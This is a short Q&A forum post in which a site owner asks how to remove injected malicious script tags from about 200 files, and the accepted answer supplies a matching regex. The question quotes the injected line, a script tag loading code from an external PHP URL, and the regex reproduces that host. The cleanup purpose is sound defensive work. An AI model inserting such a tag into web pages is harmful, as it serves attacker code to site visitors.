# How do I remove this malicious code with find/replace in Sublime Text?

Tags: replace, find, sublimetext2

I have about 200 files with the following malicious code in it:

```
<!--55cdd5--><script type="text/javascript" src="http://52120603.de.strato-hosting.eu/gm/857qqWkl.php?id=17520562"></script><!--/55cdd5-->
```

I want to do a find/replace of everything within the comment tabs on all files, but the id=XXXXXXXX portion changes in every file. I tried using asterisks as wildcards but this didn't work. Any idea how to do this?

Answer (score 0, accepted):

Figured it out!

```
<script type="text/javascript" src="http://52120603.de.strato-hosting.eu/gm/857qqWkl.php([\s\S]*?)></script>
```